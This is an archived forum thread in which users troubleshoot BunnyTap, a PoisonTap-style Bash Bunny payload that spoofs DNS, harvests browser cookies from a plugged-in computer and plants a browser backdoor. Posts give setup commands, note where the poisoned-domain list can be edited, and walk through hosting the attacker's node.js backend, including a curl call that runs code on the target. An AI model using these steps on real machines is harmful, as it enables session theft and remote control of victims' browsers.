graythang Posted March 18, 2017 Share Posted March 18, 2017 Having a lot of fun playing with BB and BunyTap. I've gotten it to load and run however I'm seeing a bit of strangeness. 1) The payload.txt runs without throwing an error but when I ssh into the BB and do a "ps -aux | grep -i screen" I only see the /usr/bin/node.js running. when I run the line from the payload.txt file "/usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i usb0 port 53" and run the grep again, it shows up in the list. At this point I'm looking for the DNS requests to be redirected, but no-joy on that so I unplug and restart from scratch. After BB & BunnyTap start up again i ssh back in and check and again dnsspoof isnt running. So this time I ran it using "/usr/sbin/dnsspoof -i usb0 port 53" so I could see any output. Testing DNS requests this time resulted in the dnsspoof responses below, but again all dns requests come back with the correct IP. (used dig, ping and browser in testing). Wireshark running on the OS X side didn't show any dns traffic from the BB either (tried it with capture set for the BB interface and again using the interface on the OS X). Anyone else seen this behavior (if so how'd you fix it)? Whistle Master - any ideas/tests that I can try? Thanks <dnsspoof output> 172.16.64.1.36702 > 8.8.8.8.53: 60675+ A? citibank.com 172.16.64.1.52442 > 8.8.8.8.53: 2452+ A? google.com 172.16.64.1.44733 > 8.8.8.8.53: 7511+ A? citibank.com 172.16.64.1.59932 > 8.8.8.8.53: 47184+ A? anyhwere.com 172.16.64.1.44565 > 8.8.8.8.53: 57995+ A? anyhwere.com 172.16.64.1.50786 > 8.8.8.8.53: 32458+ A? anyhwere.com 172.16.64.1.44234 > 8.8.8.8.53: 12251+ A? anyhwere.com 172.16.64.1.58344 > 8.8.8.8.53: 10966+ A? example.cm 172.16.64.1.57680 > 8.8.8.8.53: 35170+ A? example.com 172.16.64.1.58216 > 8.8.8.8.53: 10032+ A? may.com Link to comment Share on other sites More sharing options...
graythang Posted March 18, 2017 Share Posted March 18, 2017 k.... dnsspoof not running at start-up resolved. Still no-joy with redirects.. Link to comment Share on other sites More sharing options...
graythang Posted March 18, 2017 Share Posted March 18, 2017 Update: I plugged BB w/BT into a windows 7 laptop and it ran like a champ dumping cookies into the posontap.cookies.log. But for reasons I haven't sorted out yet it appears the BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file). Going to try it on a MBP just as soon as the wife isn't looking (evil grin).... just kidding, she's used to my ""testing"" stuff on her system. Deal is "i break-it - I bought it" lol If anyone has already successfully ran BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know. Thanks Link to comment Share on other sites More sharing options...
MrMoi Posted March 19, 2017 Share Posted March 19, 2017 Hi everyone ! I can't install dnspoof.. my BashBunny still blinking white.. I've shared my network card and fixe an IP to the BashBunny. What I did wrong ? thank you Link to comment Share on other sites More sharing options...
wrewdison Posted March 20, 2017 Share Posted March 20, 2017 On 3/18/2017 at 1:35 PM, graythang said: Update: I plugged BB w/BT into a windows 7 laptop and it ran like a champ dumping cookies into the posontap.cookies.log. But for reasons I haven't sorted out yet it appears the BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file). Going to try it on a MBP just as soon as the wife isn't looking (evil grin).... just kidding, she's used to my ""testing"" stuff on her system. Deal is "i break-it - I bought it" lol If anyone has already successfully ran BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know. Thanks Did you change the ATTACKMODE in the payload.txt? Link to comment Share on other sites More sharing options...
MrMoi Posted March 20, 2017 Share Posted March 20, 2017 thanx for your answer I changed it for ATTACKMODE RNDIS_ETHERNET, I'm on windows but not working Link to comment Share on other sites More sharing options...
wrewdison Posted March 20, 2017 Share Posted March 20, 2017 I've not tried it on Mac yet, but I'll play around with it tonight. Link to comment Share on other sites More sharing options...
graythang Posted March 20, 2017 Share Posted March 20, 2017 3 hours ago, wrewdison said: Did you change the ATTACKMODE in the payload.txt? sure did Link to comment Share on other sites More sharing options...
Gachnang Posted March 22, 2017 Share Posted March 22, 2017 @MrMoi I have installed it manually: Plug in with " ATTACKMODE RNDIS_ETHERNET ", share connection, open putty and run "apt-get -y install dsniff". After that, removed 'install.sh'. BunnyTab working great by me! Also, I have added some tewaks to share: https://github.com/hak5/bashbunny-payloads/pull/81 Link to comment Share on other sites More sharing options...
graythang Posted March 30, 2017 Share Posted March 30, 2017 On 3/14/2017 at 7:33 PM, Onus said: q I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet). Working on a hiccup - once i have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab. The hiccup I'm working on is on the client side... Bunnytap runs, collects cookies but ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run. I can manually open the backdoor file I copied over to the client in the browser and it triggers the web service connection and at this point I can send curl commands etc. So the file works, but only if I kick it off manually. Client is Win7 and I get the same results in both IE 11 and Chrome. odd. Link to comment Share on other sites More sharing options...
wrxratd Posted March 31, 2017 Share Posted March 31, 2017 On 3/29/2017 at 10:34 PM, graythang said: I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet). Working on a hiccup - once i have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab. The hiccup I'm working on is on the client side... Bunnytap runs, collects cookies but ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run. I can manually open the backdoor file I copied over to the client in the browser and it triggers the web service connection and at this point I can send curl commands etc. So the file works, but only if I kick it off manually. Client is Win7 and I get the same results in both IE 11 and Chrome. odd. Yes a walkthrough would be clutch Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted April 2, 2017 Share Posted April 2, 2017 So i have the posion tap files but when trying to get it to work i get the blinking red light then goes to white and sits there forever...... Anyone succesfully installed the posiontap on bashbunny? Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted April 2, 2017 Share Posted April 2, 2017 when trying to install the ./install im getting permissons deined iv tried everything to get it to work anyi deaS? Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 3, 2017 Share Posted April 3, 2017 5 hours ago, Mr.Pupp3T said: when trying to install the ./install im getting permissons deined iv tried everything to get it to work anyi deaS? Including run as admin? :P Link to comment Share on other sites More sharing options...
Gachnang Posted April 3, 2017 Share Posted April 3, 2017 @Mr.Pupp3T To install it manually: 1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows) 2. Connect over TCP (172.16.64.1) to the BashBunny 3. Run ping 8.8.8.8 to be sure, internet is working (ping googles DNS) 4. Run apt-get -y install dsniff to install "dsniff" 5. Delete (or rename) "install.sh" in the swtich# folder where PiosionTab is so the bunny doesen't try to run it (red blinking when failed / no internet, you already installed dependencies by step 4!) (Maybe easier when you replug BashBunny in arming-mode (Serial and storage)) 6. Try it again @Dave-ee Jones On the BashBunny, you log in as "root", so you already call everything as admin.. As funny like "Do you tried to turn it off and back on again?" :P Link to comment Share on other sites More sharing options...
Gachnang Posted April 3, 2017 Share Posted April 3, 2017 6 hours ago, Mr.Pupp3T said: when trying to install the ./install im getting permissons deined iv tried everything to get it to work anyi deaS? 1 hour ago, Dave-ee Jones said: Including run as admin? :P Just firgured out, what could be the problem.. Have you tried to install it on your local machine instead on the BashBunny? Install it on the BashBunny, not on your computer. BashBunny needs it, not you ;) Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted April 3, 2017 Share Posted April 3, 2017 3 hours ago, Gachnang said: @Mr.Pupp3T To install it manually: 1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows) 2. Connect over TCP (172.16.64.1) to the BashBunny 3. Run ping 8.8.8.8 to be sure, internet is working (ping googles DNS) 4. Run apt-get -y install dsniff to install "dsniff" 5. Delete (or rename) "install.sh" in the swtich# folder where PiosionTab is so the bunny doesen't try to run it (red blinking when failed / no internet, you already installed dependencies by step 4!) (Maybe easier when you replug BashBunny in arming-mode (Serial and storage)) 6. Try it again @Dave-ee Jones On the BashBunny, you log in as "root", so you already call everything as admin.. As funny like "Do you tried to turn it off and back on again?" :P 5 ok so i have done what you have said above. I'm running the dsniff command, an it says failed to fetch the required files. Link to comment Share on other sites More sharing options...
Bryfi Posted April 3, 2017 Share Posted April 3, 2017 Weird. I am not getting poisontap to work on locked computers with browsers open. Anyone get this feature to work Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted April 5, 2017 Share Posted April 5, 2017 So I have been playing with this. Worked right off the back. Noticed on my Windows 10 test machine it fires up the browser automatically, wonder if it pretends to be a hotel network with a captive portal and with MS and all their auto stuff fires off a browser to it so you can okay the agreement? Anyway. I have been wondering how you can modify the poison url list? Have not been able to find it yet. Must be missing something. Wondered if it can be changed for more targeted attacks. Have issues getting the poisoned pages to respond back to my backend server that is on another machine but have a funny feeling it might be because domain violation with and external site trying to talk to an internal site. Might have to try using a hosted to host it and see what happens. Link to comment Share on other sites More sharing options...
Gachnang Posted April 5, 2017 Share Posted April 5, 2017 6 hours ago, PoSHMagiC0de said: I have been wondering how you can modify the poison url list? Have not been able to find it yet. At the bottom of "target_injected_xhtmljs.html" is a function called "getDoms" which returns the list of urls. You can freely edit it there. Link to comment Share on other sites More sharing options...
Bryfi Posted April 7, 2017 Share Posted April 7, 2017 Bunnytap from repo not working with 1.1. No results popping up and LED turns off completely afterwards but stays red. UPDATE: Seems to be completely incompatible with new firmware. Tried repo and modified versions of bunnytap and it seems to be broken. Other updated payloads are working fine. Link to comment Share on other sites More sharing options...
maehko Posted April 9, 2017 Share Posted April 9, 2017 I was running into similar issue and it appears that the new firmware fails on previously valid LED combinations. For instance, any reference to LED R G B now seems to fail on firmware 1.1 since the proper syntax is now LED W. I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands. This seems like an oversight and will probably break all previously created scripts that used combo-LED commands. I would expect a future update that will accept both multi and composite codes so previous payloads using mutli-codes won't continue to fail just because of the syntax change. Link to comment Share on other sites More sharing options...
Bryfi Posted April 10, 2017 Share Posted April 10, 2017 On 4/9/2017 at 1:36 AM, maehko said: I was running into similar issue and it appears that the new firmware fails on previously valid LED combinations. For instance, any reference to LED R G B now seems to fail on firmware 1.1 since the proper syntax is now LED W. I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands. This seems like an oversight and will probably break all previously created scripts that used combo-LED commands. I would expect a future update that will accept both multi and composite codes so previous payloads using mutli-codes won't continue to fail just because of the syntax change. Can't get it to run anymore. The lights come on but the attack does not work. Nothing pops up stating I am getting cookies. Think this is the only payload that is bricked for me besides quickcreds. I edited like you said you did and nothing pops up anymore. Link to comment Share on other sites More sharing options...
graythang Posted April 11, 2017 Share Posted April 11, 2017 On 3/30/2017 at 11:27 PM, wrxratd said: Yes a walkthrough would be clutch Things have gotten really hectic and haven't had the chance to do this up right. But since someone asked about it, here is a brief rundown on how I setup node.js You will need to setup a URL that you can use. I was a lazy and setup a DYNDNS to point back to myself then used VMs in bridged mode and let them run (it was simpler for me to open the inbound port I used on my FW when ever I was testing and close it afterwards). Next - I Installed node.js on Kali. I followed these instructions (https://relutiondev.wordpress.com/2016/01/09/installing-nodejs-and-npm-kaliubuntu/), when finished with the install run "npm install websocket" (the setup wouldn't work until i did this bit) Next load up poison tap on Kali using "get clone https://github.com/samyk/poisontap.git". If your using the default port (1337), no other changes are needed. But you'll need to read Samy's instructions and update a few files if your changing the port. Now, edit the BunnyTap "backdoor.html" replacing all occurrences of "YOUR.DOMAIN" with your DYNDNS URL. on Kali cd in to the poisontap directory and run "node backend_server.js". The response you should see will have "Server is listening on port 1337" listed in it. Now take the BB and run your attack. *****notes****** Even though both are on my network the traffic from target to node.js server was: [target Win7 vm] -> Internet -> DynDNS -> [my FW] -> [Kali Vm] As I noted in my previous post, I found that the attack worked but the back door wasn't available until I manually ran the "backdoor.html on the target. Once i did I could use a curl command on Kali to have the node.js pop an alert on the win7 target. e.g.: curl 'http://myDYNDNS.URL:1337/exec?alert("test")' Haven't had time to work out why the back door isn't automatically loading on the target when the attack is ran yet. Sorry about the rush job and I hope this helps someone a little. Link to comment Share on other sites More sharing options...
zippythechimp Posted October 5, 2017 Share Posted October 5, 2017 Do you have to use a registered url or will a static IP work for the public server ? Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.